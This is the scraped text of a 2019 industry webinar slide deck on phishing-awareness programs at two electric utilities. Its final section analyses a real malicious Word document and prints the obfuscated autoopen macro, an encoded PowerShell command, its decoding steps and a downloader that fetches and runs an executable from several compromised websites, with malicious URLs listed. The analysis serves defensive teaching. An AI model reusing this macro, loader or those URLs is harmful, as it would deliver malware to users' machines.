MRO Security Advisory Council (SAC) Webinar A Tale of Two Phishing - - PowerPoint PPT Presentation

mro security advisory council sac webinar
SMART_READER_LITE
LIVE PREVIEW

MRO Security Advisory Council (SAC) Webinar A Tale of Two Phishing - - PowerPoint PPT Presentation

Sep 01, 2022 40 likes •473 views

MRO Security Advisory Council (SAC) Webinar A Tale of Two Phishing Programs Seth Bross, Enterprise Security Analyst, OGE Energy Corporation Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company Jamie

slide-1
SLIDE 1

MRO Security Advisory Council (SAC) Webinar

“A Tale of Two Phishing Programs”

Seth Bross, Enterprise Security Analyst, OGE Energy Corporation Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company Jamie Arndt, Senior Cyber Security Engineer, American Transmission Company

July 11, 2019

slide-2
SLIDE 2

A Tale of Two Phishing Programs

MRO Presentation July 11, 2019

slide-3
SLIDE 3

atcllc.com

ATC – Phishing Program

Tammy Retzlaff, CISSP, CISM, CRISC Information Security Analyst

slide-4
SLIDE 4

atcllc.com

3

  • ATC was founded in 2001 as a transmission-only utility

serving the Upper Peninsula of Michigan, the eastern half

  • f Wisconsin, and a small portion of Illinois.
  • We manage almost10,000 miles of

high-voltage transmission lines and 568 substations.

  • We have approximately 600 employees and 1800+/-

contractors.

Who We Are

slide-5
SLIDE 5

atcllc.com

4

In 2012 malicious email attacks were increasing almost daily…

– Employees unaware of the risk – Leaders unaware of the risk – No easy way to report suspected phishing emails – Email investigations difficult and time consuming

  • We knew we needed to do something …

Where We’ve Been

slide-6
SLIDE 6

atcllc.com

5

  • Looked for ways to train our employees on the dangers of

phishing

  • Decided on the good behaviors we wanted to re-enforce
  • Researched tools where out there to help us
  • Gained buy-in from leaders

How We Started

slide-7
SLIDE 7

atcllc.com

6

  • 2012 – purchased a tool to help us “phish” our employees
  • 2013 – began running Monthly Scenarios

– Immediate Education – Easy ways to report – Focus on Good behaviors – report, report, report

  • 2016 – Assessed the program from a Human

Performance standpoint

  • 2017 - Corporate Goal – tied to bonus
  • 2018 – Made improvements to the program

– In person conversations for repeat clickers – Retest for individuals who fell for the phish

The Journey

slide-8
SLIDE 8

atcllc.com

7

  • Read and discuss opportunity for all employees
  • Quarterly prize drawings for reporters
  • Depts challenge each other
  • “Leader Board”
  • Catalyst to talk about security across the organization

Where We Are Today

slide-9
SLIDE 9

atcllc.com

8

Trends

Reporting of phishing scenarios is trending upward Clicking on phishing scenarios is trending downward

slide-10
SLIDE 10

atcllc.com

9

  • Increasing difficulty of scenarios
  • Targeted scenarios in addition to monthly
  • Tighter tie-in with Human Performance

Where We’re Going

slide-11
SLIDE 11

atcllc.com

10

  • Leadership support of the program is key in its success
  • Focusing on positive behaviors gets better buy-in than

focusing on negative behaviors

  • Partner with as many people in the organization as

possible

  • Deliver your message in person as often as possible
  • Reinforce your message as often as possible

Lessons Learned

slide-12
SLIDE 12

11

Internal Phishing Program

Seth Bross, CISSP Systems Security Analyst

slide-13
SLIDE 13

12

Company Overview

  • Founded in 1902
  • Around 3000 active members
  • Our company works the entire electric stack from generation and

transmission to distribution.

slide-14
SLIDE 14

13

Phishing Program Overview

  • Every Member receives a simulated phishing email once a month
  • Training is provided in cases where a member falls for a simulated phishing email.
  • Training is provided through our phishing/training vendor automatically
  • Simulated phishing emails are from the vendor based on real phishing emails
  • All suspect emails reported are run through an automated verification system and

responded to.

slide-15
SLIDE 15

14

Benefits

  • Increased awareness of the types of emails that are phishy
  • More contact between the business and Security
  • Training can be provided immediately and can be tailored to issues
  • Reduce phishing attack surface
  • Increased contact with security
slide-16
SLIDE 16

15

Automated Response to Submitted emails

  • By utilizing SOAR we have been able to reduce the man hours needed to

respond to emails drastically.

  • Increased reporting capabilities
  • More insight into the effectiveness of our tools
  • The SOAR platform allows for some automated analysis that would

normally require manual examination.

slide-17
SLIDE 17

16

Forward Outlook

  • SOAR (Security Orchestration, Automation and Response) improvements
  • Increased the ability to integrate tools and use external input to increase

automated response.

  • Reduce time needed to analyze and respond to emails
  • Further integrations with SOAR tools, email servers and End Point

Protection Tools

slide-18
SLIDE 18

17

Lessons Learned

  • Some people will feel “Tricked” when they fail a test and it can result in

non-productive interactions.

  • Messaging must go out early and frequently to allow time for employees to

understand the purpose of the tests and how they are used.

  • Make sure that the security tests are not used as a stick but as a training
  • pportunity
  • Automate early, automate often
slide-19
SLIDE 19

18

Simulated Phishing Email Example

slide-20
SLIDE 20

19

Detection Evasion

slide-21
SLIDE 21

20

Detection Evasion

slide-22
SLIDE 22

21

Detection Evasion

slide-23
SLIDE 23

atcllc.com

ATC – Manual Investigation

Jamie Arndt Senior Cybersecurity Engineer

slide-24
SLIDE 24

Spam

slide-25
SLIDE 25

Malicious URLs

http://www.puynag-china.com/server/?email=[email here]

slide-26
SLIDE 26

Malicious Documents

https://luxur.club/wp-content/25ke-t65cr-eczyfts

slide-27
SLIDE 27

Obfuscate ted m macros

Sub autoopen() On Error Resume Next <snip> jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782)) End If l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) If YQUw_U = UBoABkAk Then lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA)) <snip> End Sub

slide-28
SLIDE 28

Obfuscate ted m macros

Sub autoopen() On Error Resume Next <snip> jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782)) End If l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) If YQUw_U = UBoABkAk Then lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA)) <snip> End Sub

slide-29
SLIDE 29

l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) Function dDZBAQoc() <snip> SAAAkQAC = "LgAoACAAKABbAFMAVAByAGkAb . . .” <snip> bwcQAAAA = "tAGoATwBpAE4AJwAnACkAKAAgA . . .” <snip> dDZBAQoc = SAAAkQAC + bwcQAAAA + BAwAAoCA + . . . End Function

slide-30
SLIDE 30

All p pieced t togeth ther

powershell -e LgAoACAAKABbAFMAVAByAGkAbgBHAF0AJABWAGUAcgBCAG8AcwBFAFAAUgBlAEYAZQBSAGUAbgBDAGUAKQBbADEALAAzAF0AKwAnAFgAJwAtAGoATwBp AE4AJwAnACkAKAAgAE4AZQBXAC0ATwBCAEoARQBjAHQAIAAgAHMAWQBTAFQARQBtAC4ASQBvAC4AQwBPAG0AUABSAGUAUwBzAGkATwBOAC4ARABFAEYA bABhAFQAZQBzAHQAUgBFAGEATQAoAFsASQBPAC4ATQBFAE0AbwByAHkAUwB0AFIARQBhAG0AXQBbAHMAeQBTAFQAZQBNAC4AYwBPAE4AdgBlAFIAVABd ADoAOgBmAFIAbwBNAEIAQQBzAGUANgA0AHMAdABSAEkATgBnACgAKAAnAFgAVgBMAFIAYQAnACsAJwB0AHMAJwArACcAdwBGAFAAMABWAFAAeAAnACsA JwBpAFUAawAnACsAJwBFAFYASwAnACsAJwBSADIAJwArACcARwAnACsAJwBoAHgAJwArACcAdABDACcAKwAnAHIAJwArACcAbQAnACsAJwBJAFgAcwBv AGMAUAAnACsAJwBiAGgAJwArACcASQBzAFoAJwArACcAQgBFACcAKwAnAFcAKwBTAFQAUQA3ACcAKwAnAGsAaQBjAHIAJwArACcAYwAnACsAJwBkAHEA UQBmADUAOQBTACcAKwAnADIAbQBhAGIASABpADYANgA0AHQAeAB6ACcAKwAnAGoAJwArACcAbwA0ACcAKwAnAFUANQAnACsAJwAwAEwATQB4ACcAKwAn AFAAJwArACcASwBZACcAKwAnAGsAJwArACcAbgBWADIAQwAvADEAcwBTAFoASgA0AEIAWABQACcAKwAnAFIAbAAnACsAJwA1ACcAKwAnAEMAJwArACcA bgAnACsAJwBCACcAKwAnAHYAdQB4AFgAJwArACcAZgAxAEMANQBhAE0ASAA5AEwAVAAnACsAJwBBADEAYQB6AFIAYQBIAHcAUwAnACsAJwBhADgAaABM ACcAKwAnAFkAJwArACcAUwBFAGwAVwArAC8AJwArACcAYgAnACsAJwBPACcAKwAnADgAYQBrAFUAdAAnACsAJwBoACcAKwAnADEAJwArACcAcgBRAHUA RgAnACsAJwB1ACcAKwAnAHEAcQAnACsAJwBUAHIAcABhAE8ASwAnACsAJwByAHQAagBmAFQAdABXADEAJwArACcAdgBnAHcAeABLACcAKwAnAFoAVgB6 ACcAKwAnAGUANQBmADgAYQB2AEcAYgBxAGoAJwArACcAMABSADIAMgAnACsAJwBvAFUAJwArACcAaABlACcAKwAnAFEAcgBIAGIAYQBzAEcATAAnACsA JwA2AGcATwArAFkAJwArACcAdwBFAGwAMwAnACsAJwB1ACcAKwAnAHQATQBIACcAKwAnAGUAJwArACcAVwBHACcAKwAnAGkAKwBJAEwAJwArACcAVABS AGoAWAAnACsAJwA3AEMAagBzADIAJwArACcASwB5AFoAWABOAHUAdABNACcAKwAnAHIAVgBXACcAKwAnAE4AcgBxAE8AMQAzACcAKwAnAFEAYwA1AFYA KwBIAGgAZgAnACsAJwAvADEAOQAyADEAaABaAGQAYQAnACsAJwB5AC8AJwArACcAYQBRACcAKwAnADUALwAnACsAJwBHAFoARgBxAEsAOQAwAHoAMABx ACcAKwAnAGMASgBiAFIAJwArACcAdQAyAGsAJwArACcAUQAwADYATAAnACsAJwBkACcAKwAnAG0AUAAnACsAJwBiACcAKwAnAHgAdABHADYAJwArACcA UABlADIAMAAnACsAJwBYADUAJwArACcAQQA3ACcAKwAnAHMAawB3AGkAWgArAHoATwBvACcAKwAnAE4AbAB5AEEAbQA0ADQARAAnACsAJwBiAEUAdABB ADMAJwArACcASgAnACsAJwBaAFMASgAnACsAJwBLACcAKwAnAEkAJwArACcAegBMADkAOQAnACsAJwBEAEgAMABpAHgAdgBnACcAKwAnAGoAeQBXADMA JwArACcASwBmACcAKwAnAGsAJwArACcAaQBZAEEAawBxAEUAKwBIACcAKwAnAHcASwA1ACcAKwAnAFEAMQBoACcAKwAnAEsAQgBpAE4ASQBlADcAZgAn ACsAJwBZACcAKwAnAGUAdQBkACcAKwAnAFgAYQAnACsAJwB0ACcAKwAnAEcAJwArACcAeAB5AFIAJwArACcAbgAyAFQAJwArACcAMABTACcAKwAnAGoA RQAnACsAJwBpACcAKwAnAEYAJwArACcASQA5AEkAawByAFYAMQAnACsAJwBHAE4AdwBNAFkAJwArACcAZwBYAEEAWQBYADcAawAnACsAJwBrAFQAJwAr ACcAYgBSAFcAJwArACcAOQBUACcAKwAnAEQAawAzACcAKwAnAGQAUAAnACsAJwBwAC8AZQAnACsAJwAzAG8AWgBuACcAKwAnAHQAegBlAFUAKwBuAHcA UABaAGQAZQAnACsAJwBKAEQAJwArACcAOQBLACcAKwAnAFoANABjAFEAdwB6ACcAKwAnAFgAJwArACcAdgAnACsAJwBLAFUATABQAEkAZQAnACsAJwBs AG0AVQBPAEoARgAnACsAJwBtAHMAbwAnACsAJwA4AEYAZwBqAG4ANgA4ADgATABpADcAUQBtACcAKwAnAG0AJwArACcARAAnACsAJwBaAHUATwAzADAA WABpACcAKwAnAEQAMABlADAAawByAEcARgAwACcAKwAnAFcAJwArACcAcABpAEQAcgBmACcAKwAnAEYAZgBZAEIAJwArACcATAAvACcAKwAnADUAcgB3 AE0AJwArACcALwB5AFEAbABMAFIAYwBBACcAKwAnAE8AVQAnACsAJwBsAFcAJwArACcAdwBYACcAKwAnAEsAJwArACcAZABuAE0AOQBLACcAKwAnAGUA cgAnACsAJwBVADkAbgAnACsAJwBjADkAeABBACcAKwAnAFgAawAnACsAJwBHACcAKwAnAEEAQwBJAGwAUgBhAGgAaABTADUASQAnACsAJwAvACcAKQAg ACkAIAAsACAAWwBpAE8ALgBDAG8ATQBwAHIAZQBzAHMASQBvAG4ALgBjAG8AbQBQAHIAZQBTAHMASQBvAG4ATQBPAGQARQBdADoAOgBkAEUAQwBvAG0A cABSAEUAcwBTACkAIAB8AEYAbwByAEUAYQBjAGgAIAB7ACAATgBlAFcALQBPAEIASgBFAGMAdAAgAGkATwAuAHMAVABSAGUAQQBNAHIAZQBBAGQARQBy ACgAIAAkAF8AIAAsAFsAUwB5AFMAdABFAG0ALgBUAGUAWABUAC4ARQBuAEMATwBkAEkATgBHAF0AOgA6AEEAcwBjAGkASQAgACkAIAB9ACkALgByAGUA QQBEAFQATwBFAG4ARAAoACAAKQA=

slide-31
SLIDE 31

Cyb CyberC rChef(gchq.gith thub.io)

slide-32
SLIDE 32

..(. .(.[.S.T.r.i.n.G.].$.V.e.r.B.o.s.E.P.R.e.F.e.R.e.n.C.e.).[.1.,.3.].+.'.X.'.-.j.O.i.N.'.'.).(. .N.e.W.-.O.B.J.E.c.t. . .s.Y.S.T.E.m...I.o...C.O.m.P.R.e.S.s.i.O.N...D.E.F.l.a.T.e.s.t.R.E.a.M.(.[.I.O...M.E.M.o .r.y.S.t.R.E.a.m.].[.s.y.S.T.e.M...c.O.N.v.e.R.T.].:.:.f.R.o.M.B.A.s.e.6.4.s.t.R.I.N.g.(.(.'. X.V.L.R.a.'.+.'.t.s.'.+.'.w.F.P.0.V.P.x.'.+.'.i.U.k.'.+.'.E.V.K.'.+.'.R.2.'.+.'.G.'.+.'.h.x.'.+.'.t.C .'.+.'.r.'.+.'.m.'.+.'.I.X.s.o.c.P.'.+.'.b.h.'.+.'.I.s.Z.'.+.'.B.E.'.+.'.W.+.S.T.Q.7.'.+.'.k.i.c.r.'.+.'. c.'.+.'.d.q.Q.f.5.9.S.'.+.'.2.m.a.b.H.i.6.6.4.t.x.z.'.+.'.j.'.+.'.o.4.'.+.'.U.5.'.+.'.0.L.M.x.'.+.'. P.'.+.'.K.Y.'.+.'.k.'.+.'.n.V.2.C./.1.s.S.Z.J.4.B.X.P.'.+.'.R.l.'.+.'.5.'.+.'.C.'.+.'.n.'.+.'.B.'.+.'. v.u.x.X.'.+.'.f.1.C.5.a.M.H.9.L.T.'.+.'.A.1.a.z.R.a.H.w.S.'.+.'.a.8.h.L.'.+.'.Y.'.+.'.S.E.l.W. +./.'.+.'.b.'.+.'.O.'.+.'.8.a.k.U.t.'.+.'.h.'.+.'.1.'.+.'.r.Q.u.F.'.+.'.u.'.+.'.q.q.'.+.'.T.r.p.a.O.K.'.+ .'.r.t.j.f.T.t.W.1.'.+.'.v.g.w.x.K.'.+.'.Z.V.z.'.+.'.e.5.f.8.a.v.G.b.q.j.'.+.'.0.R.2.2.'.+.'.o.U.'.+.'. h.e.'.+.'.Q.r.H.b.a.s.G.L.'.+.'.6.g.O.+.Y.'.+.'.w.E.l.3.'.+.'.u.'.+.'.t.M.H.'.+.'.e.'.+.'.W.G.'.+.' .i.+.I.L.'.+.'.T.R.j.X.'.+.'.7.C.j.s.2.'.+.'.K.y.Z.X.N.u.t.M.'.+.'.r.V.W.'.+.'.N.r.q.O.1.3.'.+.'.Q. c.5.V.+.H.h.f.'.+.'./.1.9.2.1.h.Z.d.a.'.+.'.y./.'.+.'.a.Q.'.+.'.5./.'.+.'.G.Z.F.q.K.9.0.z.0.q.'.+.'. c.J.b.R.'.+.'.u.2.k.'.+.'.Q.0.6.L.'.+.'.d.'.+.'.m.P.'.+.'.b.'.+.'.x.t.G.6.'.+.'.P.e.2.0.'.+.'.X.5.'.+ .'.A.7.'.+.'.s.k.w.i.Z.+.z.O.o.'.+.'.N.l.y.A.m.4.4.D.'.+.'.b.E.t.A.3.'.+.'.J.'.+.'.Z.S.J.'.+.'.K.'. +.'.I.'.+.'.z.L.9.9.'.+.'.D.H.0.i.x.v.g.'.+.'.j.y.W.3.'.+.'.K.f.'.+.'.k.'.+.'.i.Y.A.k.q.E.+.H.'.+.'.w. K.5.'.+.'.Q.1.h.'.+.'.K.B.i.N.I.e.7.f.'.+.'.Y.'.+.'.e.u.d.'.+.'.X.a.'.+.'.t.'.+.'.G.'.+.'.x.y.R.'.+.'.n. 2.T.'.+.'.0.S.'.+.'.j.E.'.+.'.i.'.+.'.F.'.+.'.I.9.I.k.r.V.1.'.+.'.G.N.w.M.Y.'.+.'.g.X.A.Y.X.7.k.'.+.'. k.T.'.+.'.b.R.W.'.+.'.9.T.'.+.'.D.k.3.'.+.'.d.P.'.+.'.p./.e.'.+.'.3.o.Z.n.'.+.'.t.z.e.U.+.n.w.P.Z.d .e.'.+.'.J.D.'.+.'.9.K.'.+.'.Z.4.c.Q.w.z.'.+.'.X.'.+.'.v.'.+.'.K.U.L.P.I.e.'.+.'.l.m.U.O.J.F.'.+.'. m.s.o.'.+.'.8.F.g.j.n.6.8.8.L.i.7.Q.m.'.+.'.m.'.+.'.D.'.+.'.Z.u.O.3.0.X.i.'.+.'.D.0.e.0.k.r.G.F .0.'.+.'.W.'.+.'.p.i.D.r.f.'.+.'.F.f.Y.B.'.+.'.L./.'.+.'.5.r.w.M.'.+.'./.y.Q.l.L.R.c.A.'.+.'.O.U.'.+.'.l .W.'.+.'.w.X.'.+.'.K.'.+.'.d.n.M.9.K.'.+.'.e.r.'.+.'.U.9.n.'.+.'.c.9.x.A.'.+.'.X.k.'.+.'.G.'.+.'.A.C .I.l.R.a.h.h.S.5.I.'.+.'./.'.). .). .,. .[.i.O...C.o.M.p.r.e.s.s.I.o.n...c.o.m.P.r.e.S.s.I.o.n.M.O.d.E.].:.:.d.E.C.o.m.p.R.E.s.S.). .|.F.o.r.E.a.c.h. .{. .N.e.W.-.O.B.J.E.c.t. .i.O...s.T.R.e.A.M.r.e.A.d.E.r.(. .$._. .,.[.S.y.S.t.E.m...T.e.X.T...E.n.C.O.d.I.N.G.].:.:.A.s.c.i.I. .). .}.)...r.e.A.D.T.O.E.n.D.(. .).

CyberChef Recipe

  • From Base64
  • Remove null

bytes

slide-33
SLIDE 33

.( ([STrinG]$VerBosEPReFeRenCe)[1,3]+'X'-jOiN'')( NeW- OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMorySt REam][sySTeM.cONveRT]::fRoMBAse64stRINg(('XVLRa'+'t s'+'wFP0VPx'+'iUk'+'EVK'+'R2'+'G'+'hx'+'tC'+'r'+'m'+'IXsocP' +'bh'+'IsZ'+'BE'+'W+STQ7'+'kicr'+'c'+'dqQf59S'+'2mabHi664t xz'+'j'+'o4'+'U5'+'0LMx'+'P'+'KY'+'k'+'nV2C/1sSZJ4BXP'+'Rl' +'5'+'C'+'n'+'B'+'vuxX'+'f1C5aMH9LT'+'A1azRaHwS'+'a8hL'+' Y'+'SElW+/'+'b'+'O'+'8akUt'+'h'+'1'+'rQuF'+'u'+'qq'+'TrpaOK'+ 'rtjfTtW1'+'vgwxK'+'ZVz'+'e5f8avGbqj'+'0R22'+'oU'+'he'+'QrH basGL'+'6gO+Y'+'wEl3'+'u'+'tMH'+'e'+'WG'+'i+IL'+'TRjX'+'7Cj s2'+'KyZXNutM'+'rVW'+'NrqO13'+'Qc5V+Hhf'+'/1921hZda'+'y /'+'aQ'+'5/'+'GZFqK90z0q'+'cJbR'+'u2k'+'Q06L'+'d'+'mP'+'b'+' xtG6'+'Pe20'+'X5'+'A7'+'skwiZ+zOo'+'NlyAm44D'+'bEtA3'+'J' +'ZSJ'+'K'+'I'+'zL99'+'DH0ixvg'+'jyW3'+'Kf'+'k'+'iYAkqE+H'+'w K5'+'Q1h'+'KBiNIe7f'+'Y'+'eud'+'Xa'+'t'+'G'+'xyR'+'n2T'+'0S'+' jE'+'i'+'F'+'I9IkrV1'+'GNwMY'+'gXAYX7k'+'kT'+'bRW'+'9T'+'D k3'+'dP'+'p/e'+'3oZn'+'tzeU+nwPZde'+'JD'+'9K'+'Z4cQwz'+'X' +'v'+'KULPIe'+'lmUOJF'+'mso'+'8Fgjn688Li7Qm'+'m'+'D'+'Zu O30Xi'+'D0e0krGF0'+'W'+'piDrf'+'FfYB'+'L/'+'5rwM'+'/yQlLRc A'+'OU'+'lW'+'wX'+'K'+'dnM9K'+'er'+'U9n'+'c9xA'+'Xk'+'G'+'A CIlRahhS5I'+'/') ) , [iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( )

CyberChef Recipe

  • From Base64
  • Remove null

bytes

  • Find / Replace

‘+’

slide-34
SLIDE 34

.( ([STrinG]$VerBosEPReFeRenCe)[1,3]+'X'-jOiN'')( NeW- OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMor yStREam][sySTeM.cONveRT]::fRoMBAse64stRINg(('XVL RatswFP0VPxiUkEVKR2GhxtCrmIXsocPbhIsZBEW+ST Q7kicrcdqQf59S2mabHi664txzjo4U50LMxPKYknV2C/1s SZJ4BXPRl5CnBvuxXf1C5aMH9LTA1azRaHwSa8hLYSE lW+/bO8akUth1rQuFuqqTrpaOKrtjfTtW1vgwxKZVze5f8av Gbqj0R22oUheQrHbasGL6gO+YwEl3utMHeWGi+ILTRjX 7Cjs2KyZXNutMrVWNrqO13Qc5V+Hhf/1921hZday/aQ5/ GZFqK90z0qcJbRu2kQ06LdmPbxtG6Pe20X5A7skwiZ+z OoNlyAm44DbEtA3JZSJKIzL99DH0ixvgjyW3KfkiYAkqE+ HwK5Q1hKBiNIe7fYeudXatGxyRn2T0SjEiFI9IkrV1GNwM YgXAYX7kkTbRW9TDk3dPp/e3oZntzeU+nwPZdeJD9KZ 4cQwzXvKULPIelmUOJFmso8Fgjn688Li7QmmDZuO30X iD0e0krGF0WpiDrfFfYBL/5rwM/yQlLRcAOUlWwXKdnM9 KerU9nc9xAXkGACIlRahhS5I/') ) , [iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( ) CyberChef Recipe

  • From Base64
  • Remove null

bytes

  • Find / Replace

‘+’

slide-35
SLIDE 35

.( ([STrinG]$VerBosEPReFeRenCe)[1,3]+'X'-jOiN'')( NeW- OBJEct sYSTEm.Io.COmPReSsiON.DEFlaTestREaM([IO.MEMo ryStREam][sySTeM.cONveRT]::fRoMBAse64stRINg((' XVLRatswFP0VPxiUkEVKR2GhxtCrmIXsocPbhIsZBEW+ STQ7kicrcdqQf59S2mabHi664txzjo4U50LMxPKYknV2C/ 1sSZJ4BXPRl5CnBvuxXf1C5aMH9LTA1azRaHwSa8hLY SElW+/bO8akUth1rQuFuqqTrpaOKrtjfTtW1vgwxKZVze5f 8avGbqj0R22oUheQrHbasGL6gO+YwEl3utMHeWGi+ILT RjX7Cjs2KyZXNutMrVWNrqO13Qc5V+Hhf/1921hZday/a Q5/GZFqK90z0qcJbRu2kQ06LdmPbxtG6Pe20X5A7skwi Z+zOoNlyAm44DbEtA3JZSJKIzL99DH0ixvgjyW3KfkiYAk qE+HwK5Q1hKBiNIe7fYeudXatGxyRn2T0SjEiFI9IkrV1G NwMYgXAYX7kkTbRW9TDk3dPp/e3oZntzeU+nwPZdeJ D9KZ4cQwzXvKULPIelmUOJFmso8Fgjn688Li7QmmDZu O30XiD0e0krGF0WpiDrfFfYBL/5rwM/yQlLRcAOUlWwXK dnM9KerU9nc9xAXkGACIlRahhS5I/') ) , [iO.CoMpressIon.comPreSsIonMOdE]::dECompREsS) |ForEach { NeW-OBJEct iO.sTReAMreAdEr( $_ ,[SyStEm.TeXT.EnCOdING]::AsciI ) }).reADTOEnD( ) CyberChef Recipe

  • From Base64
  • Remove null

bytes

  • Find / Replace

‘+’

Round 2

  • From Base64
  • Raw Inflate
slide-36
SLIDE 36

$QUUCU_x='fD4AwC_';$bAGUwZAQ=new-object Net.WebClient;$iAQZUoA='http://accesspress.rdsarkar.co m/wp-content/8dk/@http://blog.atxin.cc/wp- admin/W8Ne/@http://acc.misiva.com.ec/wp- includes/CW0/@http://bornkickers.kounterdev.com/wp- content/uploads/w1lv/@http://blacharze.y0.pl/galeria/TRg/ '.Split('@');$zDkDA_='fABUBo';$hUUCDU = '872';$I1ABXZBo='JUA_AcDU';$OAZkAoA=$env:userprof ile+'\'+$hUUCDU+'.exe';foreach($cAABAGxB in $iAQZUoA){try{$bAGUwZAQ.DownloadFile($cAABAGxB, $OAZkAoA);$zACBZB='IQwA_ZQA';If ((Get-Item $OAZkAoA).length -ge 40000) {Invoke-Item $OAZkAoA;$qBBZD4A='pBUAAQ';break;}}catch{}}$WAQ DAAAU='WAAUDAA'; CyberChef Recipe

  • From Base64
  • Remove null

bytes

  • Find / Replace

‘+’

Round 2

  • From Base64
  • Raw Inflate
slide-37
SLIDE 37

$QUUCU_x='fD4AwC_’; $bAGUwZAQ=new-object Net.WebClient; $iAQZUoA='http://accesspress.rdsarkar.com/wp- content/8dk/@http://blog.atxin.cc/wp-admin/W8Ne/@http://acc.misiva.com.ec/wp- includes/CW0/@http://bornkickers.kounterdev.com/wp- content/uploads/w1lv/@http://blacharze.y0.pl/galeria/TRg/'.Split('@’); $zDkDA_='fABUBo’; $hUUCDU = '872’; $I1ABXZBo='JUA_AcDU’; $OAZkAoA=$env:userprofile+'\'+$hUUCDU+'.exe’; foreach($cAABAGxB in $iAQZUoA){ try { $bAGUwZAQ.DownloadFile($cAABAGxB, $OAZkAoA); $zACBZB='IQwA_ZQA’; If ((Get-Item $OAZkAoA).length -ge 40000){ Invoke-Item $OAZkAoA; $qBBZD4A='pBUAAQ’; break;} } catch{}}; $WAQDAAAU='WAAUDAA';

slide-38
SLIDE 38

Onl nline Ana Analysi sis: s: Vi VirusTot

  • tal

al

slide-39
SLIDE 39

Online Tools: Hy Hybrid-Analysis

slide-40
SLIDE 40

On Online T e Tool

  • ls: Any.

y.run

slide-41
SLIDE 41

CA CAPE PE

slide-42
SLIDE 42

To Sum It Up…

There is no way to stop ALL phishing. Therefore...

  • Continuously educate your users
  • Provide incentives to reinforce the message
  • Build relationships with the business
  • Invest in tools
  • Automate where you can
  • Manual analysis is just as important as automation
slide-43
SLIDE 43

Questions?